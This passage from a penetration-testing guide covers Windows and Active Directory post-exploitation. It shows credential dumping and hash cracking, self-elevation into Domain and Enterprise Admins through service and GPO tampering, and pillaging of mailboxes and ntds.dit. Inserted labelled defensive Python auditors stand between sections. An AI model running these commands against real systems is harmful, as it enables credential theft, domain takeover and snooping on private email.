NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!
</pre></div>
</div>
<p>At this point, a new cmd.exe instance will be launched and network connections using NTLM initiated from that instance will use the NTLM credentials specified.</p>
</div>
<div class="section" id="write-hashes-obtained-by-wce-to-a-file">
<h4>Write hashes obtained by WCE to a file?<a class="headerlink" href="#write-hashes-obtained-by-wce-to-a-file" title="Permalink to this headline">¶</a></h4>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\>wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
</pre></div>
</div>
</div>
<div class="section" id="dump-logon-cleartext-passwords-with-wce">
<h4>Dump logon cleartext passwords with WCE?<a class="headerlink" href="#dump-logon-cleartext-passwords-with-wce" title="Permalink to this headline">¶</a></h4>
<p>The -w switch can be used to dump logon passwords stored in cleartext by the Windows Digest Authentication package. For example:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\>wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test
</pre></div>
</div>
<p><a class="reference external" href="http://www.youtube.com/watch?v=tJ0VJVrhwTE&ap=%2526fmt%3d22">This</a> video shows the use of the -w switch on a Windows Server 2008 machine.</p>
</div>
<div class="section" id="useful-information">
<h4>Useful Information<a class="headerlink" href="#useful-information" title="Permalink to this headline">¶</a></h4>
<ul class="simple">
<li>Cachedump obtains NTLM credentials from the Windows credentials cache (also called the logon cache or logon information cache). This cache can be disabled, and very often is by network, domain or Windows administrators (<a class="reference external" href="http://support.microsoft.com/kb/172931">see here</a>); WCE can still obtain credentials when it is disabled.</li>
<li>WCE obtains NTLM credentials from memory, where the system keeps them to perform single sign-on (SSO); it uses a series of techniques developed by the author of WCE.</li>
<li>Pwdump dumps NTLM credentials from the local SAM only. Suppose an administrator connects by Remote Desktop to a server that an attacker has compromised and can run WCE on: WCE can obtain the credentials of that administrator, whereas pwdump only yields the NTLM hashes of the accounts in the local SAM.</li>
</ul>
<p>The above information has been taken from the <a class="reference external" href="http://www.ampliasecurity.com/research/wcefaq.html">WCE FAQ</a>.</p>
</div>
</div>
<div class="section" id="system-security-sam-file">
<h3>System/ Security /SAM File<a class="headerlink" href="#system-security-sam-file" title="Permalink to this headline">¶</a></h3>
<p>During a penetration assessment we sometimes find VMDK (Virtual Machine Disk) files. A VMDK file can be mounted with Windows Explorer, VMware Workstation or OSFMount; after mounting, we can copy out</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>System32/config/SYSTEM
System32/config/SECURITY
</pre></div>
</div>
<p>Passwords from these files can be extracted using <a class="reference external" href="https://github.com/Neohapsis/creddump7">creddump7</a></p>
<div class="section" id="id3">
<h4>creddump7<a class="headerlink" href="#id3" title="Permalink to this headline">¶</a></h4>
<p>Run cachedump.py on the SYSTEM and SECURITY hives to extract cached domain creds:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># ./cachedump.py
usage: ./cachedump.py <system hive> <security hive> <Vista/7>
Example (Windows Vista/7):
./cachedump.py /path/to/System32/config/SYSTEM /path/to/System32/config/SECURITY true
Example (Windows XP):
./cachedump.py /path/to/System32/SYSTEM /path/to/System32/config/SECURITY false
# ./cachedump.py /mnt/win/Windows/System32/config/SYSTEM /mnt/win/Windows/System32/config/SECURITY true |tee hashes
nharpsis:6b29dfa157face3f3d8db489aec5cc12:acme:acme.local
god:25bd785b8ff1b7fa3a9b9e069a5e7de7:acme:acme.local
</pre></div>
</div>
<p>If you want to crack the hashes and have a good wordlist, John can be used. The hashes are in the ‘mscash2’ format:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># john --format=mscash2 --wordlist=/usr/share/wordlists/rockyou.txt hashes
Loaded 2 password hashes with 2 different salts (M$ Cache Hash 2 (DCC2) PBKDF2-HMAC-SHA-1 [128/128 SSE2 intrinsics 8x])
g0d (god)
Welcome1! (nharpsis)
</pre></div>
</div>
<p>The examples above are taken from the creddump7 README</p>
</div>
</div>
<div class="section" id="virtual-machine-snapshots-and-suspended-states-vmss2core">
<h3>Virtual Machine Snapshots And Suspended States - Vmss2core<a class="headerlink" href="#virtual-machine-snapshots-and-suspended-states-vmss2core" title="Permalink to this headline">¶</a></h3>
<p>This method has been directly taken from the Fuzzy Security Blog <a class="reference external" href="http://www.fuzzysecurity.com/tutorials/18.html">I’ll Get Your Credentials … Later!</a></p>
<p>If, after compromising a target, we discover that the box hosts virtual machines, we can use <a class="reference external" href="https://labs.vmware.com/flings/vmss2core">vmss2core</a> to create a core dump of any virtual machine that has suspended-state (*.vmss) or snapshot (*.vmsn) checkpoint files. These core dumps can then be parsed by the Volatility framework to extract a hashdump.</p>
<p>Make sure to use the appropriate version of vmss2core, in this case I needed the 64-bit OSX version.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># We are working with a suspended state so we need to combine *.vmss and *.vmem. If we were
dealing with a snapshot we would need to combine *.vmsn and *.vmem.
Avalon:Tools b33f$ ./vmss2core_mac64 -W
/Users/b33f/Documents/VMware/VMs/Win7-Testbed/Windows\ 7.vmwarevm/Windows\ 7-e7a44fca.vmss
/Users/b33f/Documents/VMware/VMs/Win7-Testbed/Windows\ 7.vmwarevm/Windows\ 7-e7a44fca.vmem
vmss2core version 3157536 Copyright (C) 1998-2013 VMware, Inc. All rights reserved.
Win32: found DDB at PA 0x2930c28
Win32: MmPfnDatabase=0x82970700
Win32: PsLoadedModuleList=0x82950850
Win32: PsActiveProcessHead=0x82948f18
Win32: KiBugcheckData=0x82968a40
Win32: KernBase=0x82806000
Win32: NtBuildLab=0x82850fa8
Win: ntBuildLab=7601.17514.x86fre.win7sp1_rtm.101119-1850 # Win7 SP1 x86
CoreDumpScanWin32: MinorVersion set to 7601
... 10 MBs written.
... 20 MBs written.
... 30 MBs written.
... 40 MBs written.
... 50 MBs written.
[...Snip...]
Finished writing core.
</pre></div>
</div>
<p>After transferring the coredump back out we can let volatility do its magic. We need to determine which OS the dump comes from for volatility to parse it correctly.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># We can see that volatility is unable to accurately determine the OS profile, however from the vmss2core
output above we can see that the correct profile is "Win7SP1x86".
root@Josjikawa:~/Tools/volatility# ./vol.py imageinfo -f ../../Desktop/memory.dmp
Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP0x86, Win7SP1x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : WindowsCrashDumpSpace32 (Unnamed AS)
AS Layer3 : FileAddressSpace (/root/Desktop/memory.dmp)
PAE type : PAE
DTB : 0x185000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2014-09-13 19:15:04 UTC+0000
Image local date and time : 2014-09-13 21:15:04 +0200
</pre></div>
</div>
<p>Using the “hivelist” plugin we can now get the memory offsets for the various registry hives.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>root@Josjikawa:~/Tools/volatility# ./vol.py hivelist -f ../../Desktop/memory.dmp --profile=Win7SP1x86
Volatility Foundation Volatility Framework 2.4
Virtual Physical Name
---------- ---------- ----
0x988349c8 0x3945a9c8 \??\C:\Users\Fubar\AppData\Local\Microsoft\Windows\UsrClass.dat
0x87a0c008 0x27f9f008 [no name]
0x87a1c008 0x280ed008 \REGISTRY\MACHINE\SYSTEM # SYSTEM
0x87a3a6b0 0x27d4b6b0 \REGISTRY\MACHINE\HARDWARE
0x87abe5c0 0x2802a5c0 \SystemRoot\System32\Config\DEFAULT
0x880b5008 0x231b7008 \SystemRoot\System32\Config\SECURITY
0x88164518 0x231cc518 \SystemRoot\System32\Config\SAM # SAM
0x8bd019c8 0x24aec9c8 \Device\HarddiskVolume1\Boot\BCD
0x8bdd2008 0x24772008 \SystemRoot\System32\Config\SOFTWARE
0x8f5549c8 0x1f39e9c8 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0x90e83008 0x1f09f008 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0x955a9450 0x15468450 \??\C:\System Volume Information\Syscache.hve
0x988069c8 0x3aa329c8 \??\C:\Users\Fubar\ntuser.dat
</pre></div>
</div>
<p>All that remains now is to dump the hashes. To do this we need to pass volatility’s “hashdump” module the virtual memory offsets to the SYSTEM and SAM hives, which we have.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>root@Josjikawa:~/Tools/volatility# ./vol.py hashdump -f ../../Desktop/memory.dmp --profile=Win7SP1x86
sys-offset=0x87a1c008 sam-offset=0x88164518
Volatility Foundation Volatility Framework 2.4
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Fubar:1001:aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca:::
user1:1003:aad3b435b51404eeaad3b435b51404ee:7d65996108fccae892d38134a2310a4e:::
</pre></div>
</div>
<p>These Virtual Machine coredumps can be very large (1 GB+). If transferring them over the network is not an option you can always drop a copy of volatility on the target machine. Starting from version 2.4, volatility has binary packages for Windows, Linux and OSX.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span># Binary package on OSX 10.9.4
Avalon:Volatility-2.4 b33f$ ./volatility_2.4_x64 hashdump -f ../memory.dmp --profile=Win7SP1x86
sys-offset=0x87a1c008 sam-offset=0x88164518
Volatility Foundation Volatility Framework 2.4
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Fubar:1001:aad3b435b51404eeaad3b435b51404ee:8119935c5f7fa5f57135620c8073aaca:::
user1:1003:aad3b435b51404eeaad3b435b51404ee:7d65996108fccae892d38134a2310a4e:::
</pre></div>
</div>
</div>
<div class="section" id="active-directory-built-in-groups-self-elevation">
<h3>Active Directory Built-In Groups Self-Elevation<a class="headerlink" href="#active-directory-built-in-groups-self-elevation" title="Permalink to this headline">¶</a></h3>
<p>Generally, when we talk about elevation using built-in groups, we mean going from a local administrator to a higher-privileged user.</p>
<p>As mentioned in a <a class="reference external" href="https://adsecurity.org/?p=2362">ADSecurity Blog</a> there are a few built-in groups with the ability to logon to Domain Controllers by default:</p>
<ul class="simple">
<li>Enterprise Admins (member of the domain Administrators group in every domain in the forest)</li>
<li>Domain Admins (member of the domain Administrators group)</li>
<li>Administrators</li>
<li>Backup Operators</li>
<li>Server Operators</li>
<li>Account Operators</li>
<li>Print Operators (Currently has no obvious methods of elevating privileges)</li>
</ul>
<p>During a penetration testing engagement, this is probably the least used but one of the most effective ways of compromising the domain administrator. This has been shared by Jason Filley in his blog <a class="reference external" href="http://www.jasonfilley.com/activedirectorybuiltingroupsselfelevation.html">Active Directory Built-In Groups Self-Elevation</a></p>
<div class="section" id="built-in-administrators-to-ea-da">
<h4>Built-In Administrators to EA/DA<a class="headerlink" href="#built-in-administrators-to-ea-da" title="Permalink to this headline">¶</a></h4>
<p>If you have local administrator access to the domain controller but do not have domain administrative access, the elevation is simple: from a privileged command prompt, add the user we are currently using to the Domain Admins group, and we are done.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>net group "Domain Admins" %username% /DOMAIN /ADD
</pre></div>
</div>
<p>Below are interesting cases of how one could use membership of other built-in groups to elevate to Enterprise Admin, Domain Admin or Built-In Administrator.</p>
</div>
<div class="section" id="server-operators-elevate-to-ea-da-ba">
<h4>Server Operators elevate to EA/DA/BA<a class="headerlink" href="#server-operators-elevate-to-ea-da-ba" title="Permalink to this headline">¶</a></h4>
<p>Server Operators can modify the properties of certain services. The Computer Browser (“browser”) service is disabled by default and can easily be reconfigured to run a command as SYSTEM, which on DCs has permission to modify the built-in administrative groups.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\>sc sdshow browser
D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
</pre></div>
</div>
<p>Here we see that Server Operators (“SO”) can write all properties (“WP”) for the browser service. Change the browser service properties to call “net group” instead.</p>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\>sc config browser binpath= "C:\Windows\System32\cmd.exe /c net group "Enterprise Admins" %username% /DOMAIN /ADD" type= "share" group= "" depend= ""
[SC] ChangeServiceConfig SUCCESS

C:\>sc start browser
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.
</pre></div>
</div>
</div></blockquote>
<p>Success: user added to “Enterprise Admins”</p>
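<p>The following script is an added example, not part of the page or of Jason Filley’s post: it parses an SDDL descriptor such as the one sc sdshow printed above and reports every non-administrative principal granted a right that lets it change the service’s configuration or rewrite its ACL, which is what a defender auditing services on a domain controller needs to spot. It uses the documented service-object meaning of the rights letters, under which DC is SERVICE_CHANGE_CONFIG (the right the sc config step above relies on) and WP is SERVICE_STOP; the set of trusted principals is an assumption of this example.</p>

```python
"""Audit a Windows service security descriptor (SDDL) for over-broad rights."""
import re
from dataclasses import dataclass

# Constructed input: the 'browser' service descriptor printed by sc sdshow above.
BROWSER_SDDL = (
    "D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# Meaning of the two-letter rights for service objects (the mapping sc sdshow
# uses). Note that DC is "change config" and WP is "stop" here; the same
# letters mean other things on Active Directory objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ",
}

# Rights that let a principal change what the service runs, or rewrite the
# ACL so that it can. Start/stop alone cannot change the binary path.
DANGEROUS_RIGHTS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
                    "GENERIC_ALL", "GENERIC_WRITE"}

# Well-known SID abbreviations seen in service descriptors.
TRUSTEE_NAMES = {"AU": "Authenticated Users", "BA": "Administrators",
                 "SO": "Server Operators", "SY": "Local System",
                 "WD": "Everyone", "LS": "Local Service", "NS": "Network Service"}

# Assumption for this example: on a domain controller only these principals
# should hold DANGEROUS_RIGHTS on a service.
TRUSTED_TRUSTEES = frozenset({"BA", "SY"})

ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")


@dataclass
class Ace:
    ace_type: str   # "A" allow, "D" deny, "AU" audit
    flags: str
    rights: list    # expanded right names
    trustee: str    # SID abbreviation or full SID string


def _expand_rights(token):
    """Turn a run of two-letter rights into names. Hex masks are rejected."""
    if token.lower().startswith("0x"):
        raise ValueError(f"hex access mask not supported: {token}")
    pairs = [token[i:i + 2] for i in range(0, len(token), 2)]
    return [SERVICE_RIGHTS.get(p, p) for p in pairs]


def parse_sddl(sddl):
    """Split an SDDL string into owner, group, DACL and SACL components."""
    result = {"owner": None, "group": None, "dacl": [], "sacl": []}
    # Each component starts with O:, G:, D: or S:; nothing else contains ':'.
    for part in re.split(r"(?=[OGDS]:)", sddl):
        if not part:
            continue
        kind, body = part[0], part[2:]
        if kind == "O":
            result["owner"] = body
        elif kind == "G":
            result["group"] = body
        else:
            # body may start with ACL flags (e.g. PAI) before the first '('
            aces = [Ace(t, f, _expand_rights(r), s)
                    for t, f, r, _obj, _inh, s in ACE_RE.findall(body)]
            result["dacl" if kind == "D" else "sacl"] = aces
    return result


def audit_service_sddl(sddl, trusted=TRUSTED_TRUSTEES):
    """Return allow-ACEs that grant DANGEROUS_RIGHTS to untrusted principals."""
    findings = []
    for ace in parse_sddl(sddl)["dacl"]:
        if ace.ace_type != "A" or ace.trustee in trusted:
            continue
        bad = sorted(set(ace.rights) & DANGEROUS_RIGHTS)
        if bad:
            findings.append({"trustee": ace.trustee,
                             "name": TRUSTEE_NAMES.get(ace.trustee, ace.trustee),
                             "rights": bad})
    return findings


if __name__ == "__main__":
    for f in audit_service_sddl(BROWSER_SDDL):
        print(f"{f['name']} ({f['trustee']}) can: {', '.join(f['rights'])}")
```

<p>Run against the descriptor above it reports only Server Operators, since Administrators and SYSTEM are on the trusted list and Authenticated Users hold query rights only.</p>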
</div>
<div class="section" id="account-operators-elevate-to-privileged-group-via-nested-group">
<h4>Account Operators elevate to privileged group via nested group<a class="headerlink" href="#account-operators-elevate-to-privileged-group-via-nested-group" title="Permalink to this headline">¶</a></h4>
<p>Account Operators have no permissions to modify the EA/DA/BA groups. However, if someone has been reckless enough to nest a group in a privileged group, Account Operators can still modify the nested group (by default). Suppose someone added the “NestedGroup” group as a member of the BA group:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>net group "NestedGroup" %username% /DOMAIN /ADD
</pre></div>
</div>
<p>Succeeds. The user is now a member of “NestedGroup” and by inclusion a member of BA.</p>
</div>
<div class="section" id="member-of-backup-operators-elevate-to-administrators">
<h4>Member of Backup Operators elevate to Administrators<a class="headerlink" href="#member-of-backup-operators-elevate-to-administrators" title="Permalink to this headline">¶</a></h4>
<p>The sole purpose of the BO group is to back up and restore domain controllers (or any part thereof), so that’s what we’ll do.</p>
<p>Get the SID of the target user account:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\>dsquery user -name %username% | dsget user -sid
sid
S-1-5-21-2079967355-3169663337-3296943937-1111
dsget succeeded
</pre></div>
</div>
<p>As a member of the Backup Operators group, copy the Default Domain (or other applicable) GPO to a temporary location (e.g. your Desktop):</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>C:\Windows\SYSVOL\domain\Policies\{*}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
</pre></div>
</div>
<p>Edit or add the Restricted Groups values, adding the SID of your account to the desired group (e.g. “S-1-5-32-544” == “Built-In Administrators”):</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = <etc etc etc>,*S-1-5-21-2079967355-3169663337-3296943937-1111
</pre></div>
</div>
<p>Back the file up.
Restore the file and redirect it to the real SYSVOL location, overwriting the existing GPO.
Wait for GP refresh. Success.</p>
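<p>As an added example (not from the page or from Jason Filley’s post), the Python below parses the [Group Membership] section of a GptTmpl.inf and flags members of Builtin Administrators that are not on an expected baseline, which is how a defender checking SYSVOL would catch the extra SID appended above; the baseline of RIDs 512 and 519 and the sample file contents are assumptions constructed for this example.</p>

```python
"""Audit the Restricted Groups section of a GptTmpl.inf security template."""
import codecs
import re

# Constructed sample: the page's fragment with a concrete member list in place
# of "<etc etc etc>". The domain SID is the one dsget printed above.
DOMAIN_SID = "S-1-5-21-2079967355-3169663337-3296943937"
SAMPLE_GPTTMPL = f"""[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *{DOMAIN_SID}-512,*{DOMAIN_SID}-519,*{DOMAIN_SID}-1111
"""

# Assumed baseline for this example: Builtin Administrators (S-1-5-32-544) on
# a DC should contain only Domain Admins (RID 512) and Enterprise Admins (519).
EXPECTED_MEMBERS = {
    "S-1-5-32-544": {f"{DOMAIN_SID}-512", f"{DOMAIN_SID}-519"},
}

SECTION_RE = re.compile(r"^\[(.+)\]$")
# Keys look like *<sid or name>__Members = ... or *<sid or name>__Memberof = ...
KEY_RE = re.compile(
    r"^\*?(?P<group>.+?)__(?P<kind>Members|Memberof)\s*=\s*(?P<value>.*)$",
    re.IGNORECASE,
)


def read_gpttmpl(path):
    """Read a GptTmpl.inf from disk; SYSVOL stores it as UTF-16 with a BOM."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return data.decode("utf-16")
    return data.decode("utf-8-sig")


def _split_members(value):
    """'*S-1-5-21-...-512,*S-1-5-21-...-519' -> list of bare SIDs/names."""
    return [m.strip().lstrip("*") for m in value.split(",") if m.strip()]


def parse_group_membership(text):
    """Return {group: {'members': [...], 'memberof': [...]}} from the template."""
    groups, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        sec = SECTION_RE.match(line)
        if sec:
            section = sec.group(1)
            continue
        if section != "Group Membership":
            continue
        key = KEY_RE.match(line)
        if not key:
            continue
        entry = groups.setdefault(key.group("group").strip(),
                                  {"members": [], "memberof": []})
        entry[key.group("kind").lower()] = _split_members(key.group("value"))
    return groups


def audit_group_membership(groups, expected=EXPECTED_MEMBERS):
    """Return (group, member) pairs whose member is not in the baseline."""
    return [(group, member)
            for group, allowed in expected.items()
            for member in groups.get(group, {}).get("members", [])
            if member not in allowed]


def classify_sid(sid, domain_sid=DOMAIN_SID):
    """RIDs below 1000 are well-known accounts/groups; 1000+ were created later."""
    if not sid.startswith(domain_sid + "-"):
        return "foreign or well-known SID"
    rid = int(sid.rsplit("-", 1)[1])
    return "well-known domain RID" if rid < 1000 else "created account (RID >= 1000)"


if __name__ == "__main__":
    found = audit_group_membership(parse_group_membership(SAMPLE_GPTTMPL))
    for group, member in found:
        print(f"unexpected member of {group}: {member} [{classify_sid(member)}]")
```

<p>Comparing the parsed membership of every policy under SYSVOL against a known-good baseline after each GP refresh turns the “wait for GP refresh” step above into a detection opportunity.</p>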
</div>
</div>
</div>
<div class="section" id="high-impact-exploitation">
<span id="high-impact-post-exploitation"></span><h2>High Impact Exploitation<a class="headerlink" href="#high-impact-exploitation" title="Permalink to this headline">¶</a></h2>
<p>This section mainly focuses on post-exploitation results that can be shown to higher management to demonstrate impact or risk: reading emails (either by reading .pst files or by having access to the Exchange server), having access to the file servers holding confidential data, and being able to access employees’ laptops or desktops (watching them via webcam, or listening to their surroundings via the microphone). The assumption is that we have already compromised a domain administrator of the Windows domain.</p>
<div class="section" id="outlook-data-file-pst">
<h3>Outlook data file .pst<a class="headerlink" href="#outlook-data-file-pst" title="Permalink to this headline">¶</a></h3>
<p>A Personal Folders file (.pst) is an Outlook data file that stores your messages and other items on your computer.</p>
<p>readpst (Linux) or <a class="reference external" href="https://github.com/srnsw/xena/tree/master/xena/dist/winx86">readpst.exe</a> can be used to convert a .pst mailbox to plain text so that it can be searched for passwords</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>ReadPST / LibPST v0.6.59
Little Endian implementation being used.
Usage: readpst [OPTIONS] {PST FILENAME}
OPTIONS:
-V - Version. Display program version
-D - Include deleted items in output
-M - Write emails in the MH (rfc822) format
-S - Separate. Write emails in the separate format
-e - As with -M, but include extensions on output files
-h - Help. This screen
-o <dirname> - Output directory to write files to. CWD is changed *after* opening pst file
-q - Quiet. Only print error messages
-r - Recursive. Output in a recursive format
-t[eajc] - Set the output type list. e = email, a = attachment, j = journal, c = contact
-w - Overwrite any output mbox files
</pre></div>
</div>
<p>Only one of -M -S -e -k -m -r should be specified</p>
<p>Once readpst has converted the contents of the .pst file to plaintext documents, we can search through them using the built-in “findstr” command.</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>findstr /s /i /m "password" *.*
</pre></div>
</div>
<ul class="simple">
<li>“/s” tells findstr to search through the current directory and subdirectories.</li>
<li>“/i” specifies that the search should be case insensitive.</li>
<li>“/m” tells findstr to output the file name rather than the file contents; if we output the contents, we may quickly be swamped with output that we’ll still have to sift through. Depending on the amount of output, you may also quickly exceed cmd.exe’s limits.</li>
<li>*.*, of course, means that we’re searching through files of any name and any type.</li>
</ul>
<p>The above has been taken from <a class="reference external" href="https://warroom.securestate.com/pillaging-pst-files/">Pillaging .pst Files</a></p>
</div>
<div class="section" id="pillage-exchange">
<h3>Pillage Exchange<a class="headerlink" href="#pillage-exchange" title="Permalink to this headline">¶</a></h3>
<p>This is applicable in a Microsoft environment that uses Outlook but does not back up email to .pst files.</p>
<p>The assumption is that we have already compromised the Exchange Administrator account on the Exchange server. We’ll use two techniques to search through mailboxes of interest. The first is to give ourselves full access to the targeted user’s mailbox; the second is to use built-in management features to search through a mailbox of our choosing.</p>
<div class="section" id="full-access-to-the-targeted-users-mailbox">
<h4>Full access to the targeted user’s mailbox<a class="headerlink" href="#full-access-to-the-targeted-users-mailbox" title="Permalink to this headline">¶</a></h4>
<ul class="simple">
<li>Step 1: Add a Mailbox - Create a new mailbox by using web-based Exchange Admin Center (EAC). The “mailboxes” section allows us to add a new user mailbox. The user receiving the mailbox can come from the list of Active Directory users, or the Administrator can create a new user.</li>
<li>Step 2: Mailbox Delegation - Once our new user’s mailbox is created, we can give ourselves full access to the target user’s mailbox through that mailbox’s account options. Go to the account settings of the targeted user’s mailbox, select the edit option, select “mailbox delegation,” and add our new user to the “Full Access” section. Once that’s complete, we can log in to our recently created mailbox with the username and password we set, then open the other mailbox without being required to enter any credentials.</li>
</ul>
<p>However, when we interact with their mailbox, it’s as if they are doing it, so emails previously marked as unread will be marked as read after being opened.</p>
</div>
<div class="section" id="search-mailbox-cmdlet">
<h4>Search-Mailbox cmdlet<a class="headerlink" href="#search-mailbox-cmdlet" title="Permalink to this headline">¶</a></h4>
<ul class="simple">
<li>If we have access to the Exchange server and the Exchange Management Tools are installed on a machine, they include the Exchange Management Shell, a version of PowerShell with specific features for administering Exchange. The “Search-Mailbox” cmdlet allows us to make specific search queries on mailboxes of interest without manually giving ourselves full access and logging in.</li>
<li>However, Search-Mailbox is only available to administrators holding the “Discovery Management” role. We have to add the compromised account to the members of this role by visiting the EAC, going to “permissions,” then “admin roles,” and editing “Discovery Management” to add the account we compromised.</li>
<li>Search-Mailbox Syntax</li>
</ul>
<blockquote>
<div><div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Search-Mailbox -Identity "First Last" -SearchQuery "String" -TargetMailbox "DiscoveryMailbox" -TargetFolder "Folder" -LogLevel Full
Identity is the Active Directory username
SearchQuery is the string of text we’re looking for,
TargetMailbox is the mailbox where emails containing that string will be sent (hence the need to control a mailbox),
TargetFolder is the folder in that mailbox where they’ll go
</pre></div>
</div>
</div></blockquote>
<p>Example:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>Search-Mailbox -Identity "Targeted User" -SearchQuery "Password" -TargetMailbox "NewMailboxCreated" -TargetFolder "Inbox" -LogLevel Full
</pre></div>
</div>
<p>Now we simply pop back over to the mailbox of the user we created and inspect the newly arrived email(s).</p>
<p>The above has been taken from <a class="reference external" href="https://warroom.securestate.com/pillage-exchange/">Pillage Exchange</a></p>
</div>
</div>
<div class="section" id="file-servers">
<h3>File Servers<a class="headerlink" href="#file-servers" title="Permalink to this headline">¶</a></h3>
<p>We can get a list of file servers in the Windows Active Directory by using the Get-NetFileServer function of PowerSploit’s PowerView. Once we have the file server list, we can view the file server contents with Windows Explorer. We can also mount a file server share using mount.cifs:</p>
<div class="highlight-None notranslate"><div class="highlight"><pre><span></span>mount.cifs //{ip address}/{dir} /mnt/mountdirectory --verbose -o "username=foo,password=bar,domain=domainname,ro"
</pre></div>
</div>
</div>
<div class="section" id="active-directory-database-credentials">
<h3>Active Directory Database Credentials<a class="headerlink" href="#active-directory-database-credentials" title="Permalink to this headline">¶</a></h3>
<p>Sean Metcalf has written a brilliant blog <a class="reference external" href="https://adsecurity.org/?p=2398">How Attackers Dump Active Directory Database Credentials</a></p>
<p>The above blog covers:</p>
<ul class="simple">
<li>Grabbing the ntds.dit file locally on the DC using NTDSUtil’s Create IFM</li>
<li>Pulling the ntds.dit remotely using VSS shadow copy</li>
<li>Pulling the ntds.dit remotely using PowerSploit’s Invoke-NinjaCopy (requires PowerShell remoting is enabled on target DC).</li>
<li>Dumping Active Directory credentials locally using Mimikatz (on the DC).</li>
<li>Dumping Active Directory credentials locally using Invoke-Mimikatz (on the DC).</li>
<li>Dumping Active Directory credentials remotely using Invoke-Mimikatz.</li>
<li>Dumping Active Directory credentials remotely using Mimikatz’s DCSync.</li>
</ul>
<p>The methods covered above require elevated rights since they involve connecting to the Domain Controller to dump credentials.</p>
<p>The statement “We do have all the users’ password hashes of your organization and X number of passwords were cracked in X number of days” makes a strong impact on your client.</p>
</div>
<div class="section" id="c-level-executive-webcam-microphone-user-activity-recording">
<h3>C-Level Executive - Webcam, Microphone, User Activity Recording<a class="headerlink" href="#c-level-executive-webcam-microphone-user-activity-recording" title="Permalink to this headline">¶</a></h3>
